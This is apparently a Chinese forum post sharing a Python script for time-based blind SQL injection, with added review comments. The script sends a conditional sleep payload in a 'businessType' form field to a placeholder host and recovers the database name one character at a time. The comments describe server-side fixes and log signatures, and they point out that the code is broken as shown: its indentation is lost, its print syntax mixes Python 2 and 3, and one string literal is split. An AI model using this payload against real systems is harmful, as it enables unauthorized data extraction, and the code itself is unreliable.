随手写的,觉得太垃圾了不要打我
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import time
# Time-based blind SQL injection probe, as posted. For each character position
# and each candidate character it POSTs a `businessType` value containing a
# conditional sleep, and records the candidate when the response takes longer
# than 2 seconds.
#
# NOTE(review): the paste has lost all indentation. Presumably the nesting was:
# outer loop over positions, inner loop over candidates holding everything from
# `startTime=` down to the `if`, with the three lines after the `if` inside it.
# Confirm against the author's original before relying on this reading.
#
# Defensive reading: the technique only works if the endpoint places
# `businessType` into a SQL statement without parameter binding. The fix on the
# server side is a parameterized query, plus an allow-list check if
# businessType is meant to be one of a fixed set of values. In logs, this
# traffic shows as a burst of POSTs to one endpoint from one client, with
# `sleep(` and `substring(` in the form field and response times clustered
# either near normal or just above 2 seconds.

# Candidate characters tried at each position.
payloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'
# Accumulates the recovered characters. NOTE(review): the name and the messages
# say "current user", but the injected expression below reads database(), so
# the value recovered is whatever database() returns.
user=''
print('Start to retrive current user:')
# Positions 1 through 22, so at most 22 characters are recovered.
for i in range(1,23):
for payload in payloads:
# The timer starts before the request is built, so the measured interval is
# the whole round trip and not only the server-side delay.
startTime=time.time()
headers ={'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'}
# Placeholder host as published on the page.
url = """http://www.xxx.com/user/GetDocumentTypeList"""
# The injected expression (MySQL-style if/substring/sleep): sleep 2 seconds when
# the character at position i of database() equals the candidate, else return 1.
data = {'businessType':"""if(substring(database(),{0},1)='{1}',sleep(2),1)""".format(i,payload)}
response=requests.post(url,headers=headers,data=data)
# A round trip above 2 seconds is taken as a match; `response` itself is never
# inspected, so any other cause of a slow reply is read the same way.
if time.time() - startTime > 2:
user +=payload
# Python 2 print statement, unlike the print(...) call form used elsewhere.
print 'user is:', user
# Presumably leaves the candidate loop and moves on to the next position.
break
# NOTE(review): the string literal below is split across two lines, which is not
# valid Python as shown; presumably a "\n" escape was turned into a real line
# break when the page was extracted.
print('
[Done] current user is {0}'.format(user))
效果
